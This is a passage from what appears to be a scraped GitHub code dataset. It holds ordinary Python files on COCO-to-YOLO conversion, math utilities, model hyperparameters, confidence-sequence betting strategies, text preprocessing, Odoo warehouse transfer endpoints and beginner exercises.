获取图像名字\n image_name = data_per['file_name']\n # 获取图像路径\n image_route = data_per['coco_url']\n # 获取图像的像素和ID\n image_width = data_per['width']\n image_height = data_per['height']\n image_id = data_per['id']\n imageID_all.append(image_id)\n imageID_all_info[image_id]={'width':image_width,'height':image_height,'path':image_route,'filename':image_name}\n\n elif images_attr == 'annotations':\n # 根据id遍历每张图像的bounding box\n for imageID_per in imageID_all:\n print(imageID_per)\n # 根据图像ID,构建图像基本信息子目录\n # 图像路径\n image_path = imageID_all_info[imageID_per]['path']\n # 每一张图片信息写在txt文件\n # filename1 = imageID_all_info[imageID_per]['filename'].split('.')[0]\n file_write = folder + '/' + image_path.split('.')[0].split('//')[-1] + '.txt'\n # 图像包含了多少个bounding box\n boundingBox_image = [j for j in data[images_attr] if j['image_id']==imageID_per]\n boundingBox_cord =''\n # 输出每张boundging box的坐标信息,以及所属类信息\n for boundingBox_per in boundingBox_image:\n # 添加boundingBox所属类的id\n id = boundingBox_per['category_id'] - 1\n # 位置信息转换,x,y,w,h转为xmin,ymin,xmax,ymax\n x = boundingBox_per['bbox'][0]\n y = boundingBox_per['bbox'][1]\n w = boundingBox_per['bbox'][2]\n h = boundingBox_per['bbox'][3]\n\n img_w = imageID_all_info[boundingBox_per[\"image_id\"]][\"width\"]\n img_h = imageID_all_info[boundingBox_per[\"image_id\"]][\"height\"]\n\n if round(x/img_w,6) < 0:\n lx = str(0)\n elif round(x / img_w, 6) > 1:\n lx = str(1)\n else:\n lx = str(round(x/img_w,6))\n\n if round((x+w)/img_w,6) < 0:\n rx = str(0)\n elif round((x+w)/img_w,6) > 1:\n rx = str(1)\n else:\n rx = str(round((x+w)/img_w,6))\n\n if round(y/img_h,6) < 0:\n ty = str(0)\n elif round(y/img_h,6) > 1:\n ty = str(1)\n else:\n ty = str(round(y/img_h,6))\n\n if round((y+h)/img_h,6) < 0:\n by = str(0)\n elif round((y+h)/img_h,6) > 1:\n by = str(1)\n else:\n by = str(round((y+h)/img_h,6))\n\n\n\n\n #Normalization\n\n boundingBox_cord += str(id)+' '+ lx +' '+ ty + ' '+ rx +' '+ by + '\\n'\n\n boundingBox_cord = boundingBox_cord.rstrip()\n\n with open(file_write, 'a+') as f:\n f.write(boundingBox_cord)","repo_name":"zylofor/DataFormatConversion","sub_path":"x2coco/coco2txt(yolov5).py","file_name":"coco2txt(yolov5).py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27609232665","text":"#!/usr/bin/env python3\nimport math\n\n\ndef lcm(*args:int):\n \"\"\"Return the least common multiple of x and y.\"\"\"\n res = args[0]\n for e in args[1:]:\n res = (res*int(e)) // math.gcd(res, int(e))\n return res\n\n\n# def lcm(x, y):\n# \"\"\"Return the least common multiple of x and y.\"\"\"\n# x = int(x)\n# y = int(y)\n# return (x*y) // math.gcd(x, y)\n\n\ndef gcd(*args:int):\n res = args[0]\n for e in args[1:]:\n res = math.gcd(res, e)\n return res\n\n\ndef getSmallestFactor(x, limit=100):\n \"\"\"Given a float number, return the smallest number which,\n multiplied by x, gives an integer.\"\"\"\n for i in range(1, limit):\n if float(x*i).is_integer():\n return i\n raise RuntimeError(f'The smaller factor exceeds the limit of {limit}.')\n\n\ndef dictMerge(x:dict, y:dict, ignoreKey=None):\n \"\"\"Return the dict of the union of x with y,\n adding the values of same keys. Ignore ignoreKey.\"\"\"\n c = dict()\n for k,v in x.items():\n if k != ignoreKey:\n c[k] = v\n for k,v in y.items():\n if k != ignoreKey:\n if k in c:\n c[k] = c[k] + v\n else:\n c[k] = v\n return c\n\n\ndef getCommonLine(blockIN, blockOUT):\n \"\"\"Return the common line i.e: the output of blockIn with\n the same type of an input of blockOut.\"\"\"\n # First side\n for e in blockIN.outputs:\n for f in blockOUT.inputs:\n if e == f:\n return e\n return None\n\n\n\n# TEST\ndef test():\n # Test1\n to_delete = \"HeavyOil\"\n in1 = {\"HeavyOil\": 40,\"Water\": 30}\n in2 = {\"Water\": 30}\n res = dictMerge(in1, in2, to_delete)\n assert res == {'Water': 60}\n\n # Test2\n assert 2 == getSmallestFactor(0.5)\n assert 2 == getSmallestFactor(1.5)\n assert 10 == getSmallestFactor(0.1)\n assert 4 == getSmallestFactor(0.25)\n\n # Test3\n assert 2 == gcd(4,2,8)\n assert 4 == gcd(4,8)\n assert 2 == gcd(*{4,2,8})\n\n # Test3\n assert 2 == gcd(4,2,8)\n assert 4 == gcd(4,8)\n assert 2 == gcd(*{4,2,8})\n\n\n print('\\nSuccessful Tests!')","repo_name":"Envq/FactorioBlocks","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22916715969","text":"import json\nimport os\n\nfrom tabulate import tabulate\nfrom gqn.json import JsonSerializable\n\n\nclass HyperParameters(JsonSerializable):\n def __init__(self):\n self.image_size = (64, 64)\n self.h_channels = 64\n self.z_channels = 3\n self.u_channels = 128\n self.r_channels = 256\n self.inference_share_core = False\n self.num_layers = 12\n self.generator_share_core = False\n self.initial_pixel_sigma = 2.0\n self.final_pixel_sigma = 0.7\n self.pixel_sigma_annealing_steps = 200000\n self.learning_rate_annealing_steps = 1600000\n self.representation_architecture = \"tower\"\n self.snapshot_filename = \"hyperparams.json\"\n\n def __str__(self):\n rows = []\n for key, value in self.__dict__.items():\n if key == \"snapshot_filename\":\n continue\n rows.append([key, value])\n return tabulate(rows, headers=[\"Hyperparameters\", \"\"])\n","repo_name":"musyoku/chainer-gqn","sub_path":"hyperparams.py","file_name":"hyperparams.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"27"} +{"seq_id":"35743416070","text":"import math\nimport numpy as np\nfrom scipy.optimize import root\n\n\ndef lambda_predmix_eb(\n x,\n truncation=math.inf,\n alpha=0.05,\n fixed_n=None,\n prior_mean=1 / 2,\n prior_variance=1 / 4,\n fake_obs=1,\n scale=1,\n):\n \"\"\"\n Predictable mixture lambda values or \"bets\"\n\n Parameters\n ----------\n x, array-like of 0-1 bounded reals\n Observed data\n\n truncation, positive real or infinity\n Level at which to truncate lambda\n\n alpha, (0, 1)-valued real\n Significance level in (0, 1)\n\n fixed_n, positive integer or None\n Sample size for which lambda should be optimized.\n If left as None, lambda will scale like 1/sqrt{t log t}\n\n prior_mean, [0, 1]-valued real\n Prior mean to use for regularized sample mean\n\n prior_variance, (0, 1/4]-valued real\n Prior variance to use for regularized sample variance\n\n fake_obs, positive integer\n Number of 'fake observations' to add.\n Larger values correspond to more regularization near\n `prior_mean` and `prior_variance`\n\n scale, positive real\n Scale by which to multiply final lambda output.\n For most applications, this should be left as 1\n\n Returns\n -------\n lambdas, array-like of positive reals\n A (numpy) array of lambda values or \"bets\"\n \"\"\"\n t = np.arange(1, len(x) + 1)\n mu_hat_t = np.minimum((fake_obs * prior_mean + np.cumsum(x)) / (t + fake_obs), 1)\n mu_hat_tminus1 = np.append(prior_mean, mu_hat_t[0 : (len(x) - 1)])\n sigma2_t = (fake_obs * prior_variance + np.cumsum(np.power(x - mu_hat_t, 2))) / (\n t + fake_obs\n )\n sigma2_tminus1 = np.append(prior_variance, sigma2_t[0 : (len(x) - 1)])\n if fixed_n is None:\n lambdas = np.sqrt(2 * np.log(1 / alpha) / (t * np.log(1 + t) * sigma2_tminus1))\n else:\n lambdas = np.sqrt(2 * np.log(1 / alpha) / (fixed_n * sigma2_tminus1))\n\n lambdas[np.isnan(lambdas)] = 0\n\n lambdas = np.minimum(truncation, lambdas)\n\n return lambdas * scale\n\n\ndef lambda_aKelly(\n x,\n m,\n prior_mean=1 / 2,\n prior_variance=1 / 4,\n fake_obs=1,\n N=None,\n trunc_scale=1,\n):\n assert trunc_scale > 0 and trunc_scale <= 1\n t = np.arange(1, len(x) + 1)\n S_t = np.cumsum(x)\n x_tminus1 = np.append(0, x[0 : (len(x) - 1)])\n S_tminus1 = np.cumsum(x_tminus1)\n mu_hat_t = (fake_obs * prior_mean + np.cumsum(x)) / (t + fake_obs)\n mu_hat_tminus1 = np.append(prior_mean, mu_hat_t[0 : (len(x) - 1)])\n V_t = (fake_obs * prior_variance + np.cumsum(np.power(x - mu_hat_t, 2))) / (\n t + fake_obs\n )\n V_tminus1 = np.append(prior_variance, V_t[0 : (len(x) - 1)])\n\n if N is not None:\n conditional_mu_hat_tminus1 = (N * mu_hat_tminus1 - S_tminus1) / (N - t + 1)\n mu_t = (N * m - S_tminus1) / (N - (t - 1))\n else:\n conditional_mu_hat_tminus1 = mu_hat_tminus1\n mu_t = m\n\n lambdas = (conditional_mu_hat_tminus1 - mu_t) / (\n V_tminus1 + np.power(conditional_mu_hat_tminus1 - mu_t, 2)\n )\n\n lambdas = np.maximum(-trunc_scale / (1 - mu_t), lambdas)\n lambdas = np.minimum(trunc_scale / mu_t, lambdas)\n\n return lambdas\n\n\ndef lambda_Kelly(x, m):\n lambdas_init = lambda_aKelly(x, m, trunc_scale=1)\n lambdas = np.repeat(0.0, len(x))\n for i in np.arange(1, len(x)):\n\n def EL_fn(l):\n cand_val = np.sum((x[0:i] - m) / (1 + l * (x[0:i] - m)))\n return cand_val\n\n if np.max(x[0:i]) <= m:\n lambdas[i] = -1 / (1 - m)\n elif np.min(x[0:i]) >= m:\n lambdas[i] = 1 / m\n else:\n lambdas[i] = root(EL_fn, x0=lambdas_init[i])[\"x\"]\n lambdas[np.isnan(lambdas)] = 0\n lambdas = lambdas\n\n return lambdas\n\n\ndef lambda_LBOW(x, m):\n t = np.arange(1, len(x) + 1)\n S_t = np.cumsum(x)\n mu_hat_t = (1 / 2 + S_t) / (t + 1)\n mu_hat_tminus1 = np.append(1 / 2, mu_hat_t[0 : (len(mu_hat_t) - 1)])\n sigma2_tminus1 = np.append(1 / 4, np.cumsum(np.power(x - m, 2)))[0 : len(x)] / (\n t + 1\n )\n\n g = mu_hat_tminus1 - m\n M = np.where(g > 0, m, 1 - m)\n lambdas = g / (M * np.abs(g) + sigma2_tminus1 + np.power(g, 2))\n return lambdas\n","repo_name":"gostevehoward/confseq","sub_path":"src/confseq/betting_strategies.py","file_name":"betting_strategies.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"27"} +{"seq_id":"16619998837","text":"from rest_framework import permissions\n\n\nclass IsAuthorPermission(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n return bool(\n request.method in permissions.SAFE_METHODS or\n (\n request.user and\n request.user.is_authenticated and\n obj.author == request.user.author\n )\n )","repo_name":"Miwa-Abidin/final_test_git","sub_path":"app/posts/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31115752580","text":"#Control Flow and Logical Operators\n\n\n#If else, leap year or not\n\n# Don't change the code below \nyear = int(input(\"Which year do you want to check? \"))\n# Don't change the code above \n\n#Write your code below this line \n\nif((year % 4) != 0):\n print(\"Not leap year.\")\nelif((year % 100) != 0):\n print(\"Leap year.\")\nelif((year % 400) != 0):\n print(\"Not leap year.\")\nelse:\n print(\"Leap year.\")\n\n#Pizza cost calculator\n\n# Don't change the code below \nprint(\"Welcome to Python Pizza Deliveries!\")\nsize = input(\"What size pizza do you want? S, M, or L \")\nadd_pepperoni = input(\"Do you want pepperoni? Y or N \")\nextra_cheese = input(\"Do you want extra cheese? Y or N \")\n# Don't change the code above \n\n#Write your code below this line \n# Small Pizza: $15\n# Medium Pizza: $20\n# Large Pizza: $25\n# Pepperoni for Small Pizza: +$2\n# Pepperoni for Medium or Large Pizza: +$3\n# Extra cheese for any size pizza: + $1\n\ntotalCost = 0\n#print(type(totalCost))\nif(size == \"S\"):\n totalCost += 15\n if(add_pepperoni == \"Y\"):\n totalCost += 2\nif(size == \"M\"):\n totalCost += 20\n if(add_pepperoni == \"Y\"):\n totalCost += 3\nif(size == \"L\"):\n totalCost += 25\n if(add_pepperoni == \"Y\"):\n totalCost += 3\nif(extra_cheese == \"Y\"):\n totalCost += 1\n\nprint(f\"Your final bill is: ${totalCost}.\")\n\n\n\n#Love score calculator\n\n# Don't change the code below \nprint(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? \\n\")\n# Don't change the code above \n\n#Write your code below this line \n\nname1 = name1.casefold()\nname2 = name2.casefold()\n# print(name1)\n# print(name2)\ntotalTrue = ( (name1.count('t')) + (name1.count('r')) + (name1.count('u')) + (name1.count('e')) )\ntotalTrue += ( (name2.count('t')) + (name2.count('r')) + (name2.count('u')) + (name2.count('e')) )\n#print(type(totalTrue))\ntotalLove = ( (name1.count('l')) + (name1.count('o')) + (name1.count('v')) + (name1.count('e')) )\ntotalLove += ( (name2.count('l')) + (name2.count('o')) + (name2.count('v')) + (name2.count('e')) )\n\nloveScore = str(totalTrue) + str(totalLove)\n#print(type(loveScore))\n#print(loveScore)\nloveScore = int(loveScore)\n#print(type(loveScore))\n\nif( (loveScore < 10) or (loveScore > 90)):\n print(f\"Your score is {loveScore}, you go together like coke and mentos.\")\nelif( (loveScore >= 40) and (loveScore <= 50) ):\n print(f\"Your score is {loveScore}, you are alright together.\")\nelse:\n print(f\"Your score is {loveScore}.\")","repo_name":"saucysaracha/Python-Udemy-Course","sub_path":"ControlFlow.py","file_name":"ControlFlow.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4706529448","text":"# Written by Kai Seshimo (Semester 1, 2022) \n\nfrom download_azure_records import download_azure_records\nfrom merge_sd_records import merge_sd_records\nfrom convert_PAR_to_PAI import convert_PAR_to_PAI\n\nFILE_NAME_PAR = \"PARdata.csv\" #file name to save PAR data \n\nDEV_NUM_SQ110 = 6 #device number (1 to 6) to which SQ110 is connected\nPORT_NUM_SQ110 = 1 #port number (0 to 5) to which SQ110 is connected\n\nPUBLISH_PERIOD_MINUTE = 3 #data transmission period in minute (Default: 3)\nTIME_DIFFERENCE = 10 #time difference in hour from GST (Default: 10)\n\nLONGITUDE_DEGREE = 152.33307151919604 #longitude of the field in degree\nLATITUDE_DEGREE = -27.56270886720687 #latitude of the field in degree\n\nNUM_DEVICES = 6 #number of total IoT devices. (Default: 6)\nNUM_PORTS = 6 #number of total ports on each device (Default: 6)\n\ndef main():\n PAR_lists = download_azure_records(FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, PUBLISH_PERIOD_MINUTE)\n convert_PAR_to_PAI(PAR_lists, FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, DEV_NUM_SQ110, PORT_NUM_SQ110, \\\n TIME_DIFFERENCE, LONGITUDE_DEGREE, LATITUDE_DEGREE, False)\n\n print(\"\\n\")\n answer = input(\"Do you have new SD records to merge? (Type yes or no) - Your input: \")\n if (answer == (\"yes\")):\n PAR_lists = merge_sd_records(FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, PUBLISH_PERIOD_MINUTE) \n convert_PAR_to_PAI(PAR_lists, FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, DEV_NUM_SQ110, PORT_NUM_SQ110, \\\n TIME_DIFFERENCE, LONGITUDE_DEGREE, LATITUDE_DEGREE, True)\n else:\n print(\"No new SD records\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"seshimo88/PARbar_NBIoT","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38009845797","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('codelogs', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='codelog',\n name='log',\n field=models.TextField(null=True, verbose_name='log', blank=True),\n ),\n ]\n","repo_name":"tangram/serafin","sub_path":"codelogs/migrations/0002_codelog_log.py","file_name":"0002_codelog_log.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"74717542470","text":"import re\r\nimport nltk\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport spacy\r\nfrom PyDictionary import PyDictionary\r\nfrom nltk.corpus import stopwords\r\nimport copy\r\n\r\n\r\nclass Different_Preprocessing:\r\n\r\n def __init__(self, num_words, seq_len, path_train, path_test):\r\n self.data_train = path_train\r\n self.data_test = path_test\r\n self.num_words = num_words\r\n self.seq_len = seq_len\r\n self.vocabulary = dict()\r\n self.ind_word = dict()\r\n self.x_after_split = None\r\n\r\n self.x_train = None\r\n self.x_test = None\r\n self.y_train = None\r\n self.y_test = None\r\n\r\n nlp = spacy.load('en_core_web_md')\r\n self.dictionary = PyDictionary()\r\n # nltk.download('wordnet')\r\n\r\n self.STOPWORDS = set(stopwords.words('english'))\r\n self.SYMBOLS = re.compile('[^0-9a-z #+_]')\r\n self.stemmer = WordNetLemmatizer()\r\n\r\n def do_things(self):\r\n self.load_data()\r\n self.clean_text()\r\n self.text_tokenization()\r\n self.build_vocabulary()\r\n self.word_to_idx()\r\n self.padding_sentences()\r\n\r\n def load_data(self):\r\n # Reads the raw csv file and split into\r\n # sentences (x) and target (y)\r\n\r\n df = pd.read_csv(self.data_train)\r\n # df.drop(['id','keyword','location'], axis=1, inplace=True)\r\n # print(df)\r\n self.x_train = df['text'].values\r\n self.y_train = df['target'].values\r\n for index, ele in enumerate(self.y_train):\r\n self.y_train[index] = int(ele)\r\n\r\n df = pd.read_csv(self.data_test)\r\n # df.drop(['id','keyword','location'], axis=1, inplace=True)\r\n\r\n self.x_test = df['text'].values\r\n self.y_test = df['target'].values\r\n for index, ele in enumerate(self.y_test):\r\n self.y_test[index] = int(ele)\r\n\r\n def clean_text(self):\r\n self.x_train = [x.lower() for x in self.x_train]\r\n # Removes Special Characters\r\n self.x_train = [re.sub(r'\\W', ' ', x) for x in self.x_train]\r\n # Removes single characters\r\n self.x_train = [re.sub(r'\\s+[a-zA-Z]\\s+', ' ', x) for x in self.x_train]\r\n # Removes single characters from the start\r\n self.x_train = [re.sub(r'[^A-Za-z]+', ' ', x) for x in self.x_train]\r\n self.x_train = [re.sub(r'\\^[a-zA-Z]\\s+', ' ', x) for x in self.x_train]\r\n # replace multiple spaces with single space\r\n self.x_train = [re.sub(r'\\s+', ' ', x, flags=re.I) for x in self.x_train]\r\n self.x_train = [''.join([i for i in x if not i.isdigit()]) for x in self.x_train]\r\n\r\n self.x_test = [x.lower() for x in self.x_test]\r\n # Removes Special Characters\r\n self.x_test = [re.sub(r'\\W', ' ', x) for x in self.x_test]\r\n # Removes single characters\r\n self.x_test = [re.sub(r'\\s+[a-zA-Z]\\s+', ' ', x) for x in self.x_test]\r\n # Removes single characters from the start\r\n self.x_test = [re.sub(r'[^A-Za-z]+', ' ', x) for x in self.x_test]\r\n self.x_test = [re.sub(r'\\^[a-zA-Z]\\s+', ' ', x) for x in self.x_test]\r\n # replace multiple spaces with single space\r\n self.x_test = [re.sub(r'\\s+', ' ', x, flags=re.I) for x in self.x_test]\r\n self.x_test = [''.join([i for i in x if not i.isdigit()]) for x in self.x_test]\r\n\r\n # self.x_raw = [([self.stemmer.lemmatize(word) for word in x.split()]) for x in self.x_raw]\r\n\r\n def text_tokenization(self):\r\n # Tokenizes each sentence by implementing the nltk tool\r\n self.x_train = [word_tokenize(x) for x in self.x_train]\r\n self.x_test = [word_tokenize(x) for x in self.x_test]\r\n\r\n self.x_after_split = copy.deepcopy(self.x_train)\r\n\r\n def build_vocabulary(self):\r\n # Builds the vocabulary and keeps the \"x\" most frequent words\r\n # self.vocabulary = dict()\r\n fdist = nltk.FreqDist()\r\n for sentence in self.x_train:\r\n for word in sentence:\r\n fdist[word] += 1\r\n common_words = fdist.most_common(self.num_words)\r\n # common_words = fdist.most_common(len(fdist))\r\n\r\n for idx, word in enumerate(common_words):\r\n self.vocabulary[word[0]] = (idx + 1)\r\n self.ind_word[idx] = word[0]\r\n\r\n def word_to_idx(self):\r\n # By using the dictionary (vocabulary), it is transformed\r\n # each token into its index based representation\r\n\r\n temp = list()\r\n for sentence in self.x_train:\r\n temp_sentence = list()\r\n for word in sentence:\r\n if word in self.vocabulary.keys():\r\n temp_sentence.append(self.vocabulary[word])\r\n temp.append(temp_sentence)\r\n self.x_train = temp\r\n\r\n temp = list()\r\n for sentence in self.x_test:\r\n temp_sentence = list()\r\n for word in sentence:\r\n if word in self.vocabulary.keys():\r\n temp_sentence.append(self.vocabulary[word])\r\n # else:\r\n # temp_sentence.append(-1)\r\n temp.append(temp_sentence)\r\n self.x_test = temp\r\n\r\n def padding_sentences(self):\r\n # Each sentence which does not fulfill the required len\r\n # it's padded with the index 0\r\n\r\n pad_idx = 0\r\n temp = list()\r\n\r\n for sentence in self.x_train:\r\n while len(sentence) < self.seq_len:\r\n sentence.insert(len(sentence), pad_idx)\r\n temp.append(sentence)\r\n self.x_train = np.array(temp)\r\n\r\n temp = list()\r\n for sentence in self.x_test:\r\n while len(sentence) < self.seq_len:\r\n sentence.insert(len(sentence), pad_idx)\r\n temp.append(sentence)\r\n self.x_test = np.array(temp)\r\n\r\n def inx_to_sent(self, indicies):\r\n sent = list()\r\n for ele in indicies:\r\n sent.append(self.ind_word[ele])\r\n return sent\r\n\r\n\r\n","repo_name":"ColtonAarts/CurrentThesis","sub_path":"Other/src/preprocessing/different_preprocessing.py","file_name":"different_preprocessing.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35313169293","text":"from semDiff.fullDiff import FullSemDiff\nimport json\nimport os\n\npath = os.path.join(os.path.dirname(__file__), \"./data\")\nwith open(os.path.join(path, \"dats.json\"), 'r') as dats_file:\n # Load the JSON schema and close the file\n network1 = json.load(dats_file)\n dats_file.close()\n\npath = os.path.join(os.path.dirname(__file__), \"./data\")\nwith open(os.path.join(path, \"miaca.json\"), 'r') as miaca_file:\n # Load the JSON schema and close the file\n network2 = json.load(miaca_file)\n miaca_file.close()\n\nnetworks_contexts = [network1[\"contexts\"], network2[\"contexts\"]]\nfull_diff = FullSemDiff(networks_contexts, network1[\"schemas\"], network2[\"schemas\"])\n\noutput = {\n \"network1\": network1,\n \"network2\": network2,\n \"overlaps\": full_diff.twins\n}\n\nfile_name = network1[\"name\"] + '_VS_' + network2[\"name\"] + '_overlaps.json'\nfile_full_path = os.path.join(os.path.dirname(__file__), 'fullDiffOutput/' + file_name)\n\nwith open(file_full_path, 'w') as outfile:\n json.dump(output, outfile)\noutfile.close()\n","repo_name":"agbeltran/jsonldschema","sub_path":"tests/fullDiffExample.py","file_name":"fullDiffExample.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"21860987703","text":"import json\n\nimport requests\n\nfrom odoo import http\nfrom odoo.http import request, Response\n\nclass ModulaController(http.Controller):\n\n def _do_basic_auth(self):\n auth = request.httprequest.authorization\n request.session.authenticate(request.env.cr.dbname, auth.username, auth.password)\n\n @http.route('/modula/input_request', auth='public', type='http', methods=['post'], csrf=False)\n def input_request(self, code, qty):\n self._do_basic_auth()\n\n qty = float(qty)\n\n # TODO find out a way to find stock locations without depending on localization setting\n src_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias')])[0].id\n dest_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias/Modula Slim')])[0].id\n\n return self._do_transfer(code, float(qty), src_location_id, dest_location_id)\n\n @http.route('/modula/output_request', auth='public', type='http', methods=['post'], csrf=False)\n def output_request(self, code, qty):\n self._do_basic_auth()\n\n qty = float(qty)\n\n # TODO find out a way to find stock locations without depending on localization setting\n src_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias/Modula Slim')])[0].id\n dest_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias')])[0].id\n\n return self._do_transfer(code, float(qty), src_location_id, dest_location_id)\n\n\n\n def _do_transfer(self, product_code, qty, origin_id, dest_id):\n product = request.env['product.product'].search([('default_code', '=', product_code)])\n\n if len(product) == 0:\n # if the given code was not found, 404\n return Response('could not find product with given code', status=404)\n\n if len(product) > 1:\n # sanity check, if more than one product with same code was found\n return Response(status=500)\n\n picking = request.env['stock.picking'].create([{\n 'move_type': 'one',\n 'picking_type_id': request.env.ref('modula.sf_to_modula_move_t').id,\n 'location_id': origin_id,\n 'location_dest_id': dest_id,\n }])[0]\n\n request.env['stock.move'].create([{\n 'name': '',\n 'picking_id': picking.id,\n 'product_id': product.id,\n 'product_uom': product.uom_id.id,\n 'product_uom_qty': qty,\n 'location_id': origin_id,\n 'location_dest_id': dest_id,\n }])\n\n picking[0].action_confirm()\n picking[0].action_assign()\n\n if picking[0].state != 'assigned':\n # not enough products were found, delete the picking and error out\n picking.unlink()\n return Response('unable to reserve quantity requested', status=409)\n\n return Response(str(picking[0].id), status=200)\n\n\n#\n @http.route('/modula/tray_status', auth='public', type='http',methods=['get'])\n def picking_status(self, picking_id):\n self._do_basic_auth()\n\n picking = request.env['stock.picking'].browse([int(picking_id)])\n\n response = requests.get('http://10.22.229.191/Modula/api/Picking')\n\n if len(response.text) == 0:\n return Response(json.dumps({\n 'status': 'not in picking'\n }), status=200)\n\n body = response.json()\n\n if body['Item'] != picking.move_ids[0].product_id.default_code or body['Cantidad'] != picking.move_ids[0].product_uom_qty:\n return Response(json.dumps({\n 'status': 'other product in picking',\n 'product': body['Item']\n }), status=200)\n\n return Response(json.dumps({\n 'status': 'in picking',\n 'qty': body['Cantidad'],\n 'tray_id': body['Baia'], # (sic)\n 'pos_x': body['PosX'],\n 'pos_y': body['PosY'],\n 'dim_x': body['DimX'],\n 'dim_y': body['DimY'],\n }), status=200)\n\n\n @http.route('/modula/request_confirmation', auth='none', type='http',methods=['post'], csrf=False)\n def request_confirmation(self, picking_id):\n self._do_basic_auth()\n\n picking = request.env['stock.picking'].browse([int(picking_id)])\n\n action = picking.button_validate()\n\n for key in action.keys():\n print(key)\n\n transfer = request.env['stock.immediate.transfer']\n\n transfer = transfer.create([{\n 'pick_ids': [picking.id],\n }])\n\n transfer_line = request.env['stock.immediate.transfer.line']\n\n transfer_line.create([{\n 'to_immediate': True,\n 'immediate_transfer_id': transfer[0].id,\n 'picking_id': picking[0].id,\n }])\n\n transfer[0].with_context(action['context']).process()\n\n return Response(status=200)","repo_name":"SmartFactory-Tec/odoo_addons","sub_path":"modula/controllers/ModulaController.py","file_name":"ModulaController.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33707720805","text":"def notas(*nota, sit=False):\n \"\"\"\n --> Função para analisar notas e a situação de um aluno(a)\n :param nota: Recebe as notas, pode receber uma ou mais (aceita várias)\n :param sit: (opcional) Adiciona ao dicionário a situação do aluno(a):\n Se média >= 7: situação = BOA\n Se 5 <= média < 7: situação = RAZOÁVEL\n Se média < 5: situação = RUIM\n :return: Retorna um dicionário contendo o total de notas, a maior, a menor, a média, e pode retornar a situação\n \"\"\"\n notas_dic = {\n 'total': len(nota),\n 'maior': max(nota),\n 'menor': min(nota),\n 'média': sum(nota)/len(nota)\n }\n if sit:\n if notas_dic['média'] >= 7:\n notas_dic['situação'] = 'BOA'\n elif 5 <= notas_dic['média'] < 7:\n notas_dic['situação'] = 'RAZOÁVEL'\n else:\n notas_dic['situação'] = 'RUIM'\n return notas_dic\n\n\n# Programa Principal\nresp = notas(5, 10, 0, sit=True)\nprint(resp)\nhelp(notas)\n","repo_name":"JoaoBortolace/Python","sub_path":"exercícios/5 - Funções/def105.py","file_name":"def105.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40030772936","text":"import pandas as pd\nfrom pandas import DataFrame\nimport numpy as np\nfrom sklearn import metrics\nimport heapq\nimport random\nfrom random import choice\nfrom copy import deepcopy\n\n\ndef calclass(value, threshold):\n new_value = []\n for i in value:\n if i > threshold:\n new_value.append(1)\n else:\n new_value.append(0)\n return new_value\n\n\ndef binary_perf_ddG(Y_true, Y_pred, threshold=1.36):\n\n y_true = calclass(Y_true, 1.36)\n y_pred = calclass(Y_pred, threshold)\n\n # calculate the precision, recall and F1\n F1_score = metrics.f1_score(y_true, y_pred)\n Recall_score = metrics.recall_score(y_true, y_pred)\n Precision_score = metrics.precision_score(y_true, y_pred)\n Balanced_accuracy_score = metrics.balanced_accuracy_score(y_true, y_pred)\n MMC = metrics.matthews_corrcoef(y_true, y_pred)\n\n # record the performance\n perf = {\n 'Recall': Recall_score,\n 'Precision': Precision_score,\n 'Balanced Accuracy': Balanced_accuracy_score,\n 'F1 Score': F1_score,\n 'Matthews Correlation Coefficient': MMC\n }\n\n return perf\n\n\ndef binary_perf_top(Y_true, Y_pred, threshold=0.15):\n \n top = int(len(Y_pred)*threshold)\n top_index = heapq.nlargest(top, range(len(Y_pred)), Y_pred.__getitem__)\n top_pred = []\n\n for i in range(len(Y_pred)):\n if i in top_index:\n top_pred.append(1)\n else:\n top_pred.append(0)\n\n y_true = calclass(Y_true, 1.36)\n\n perf = {\n 'Recall': metrics.recall_score(y_true, top_pred),\n 'Precision': metrics.precision_score(y_true, top_pred),\n 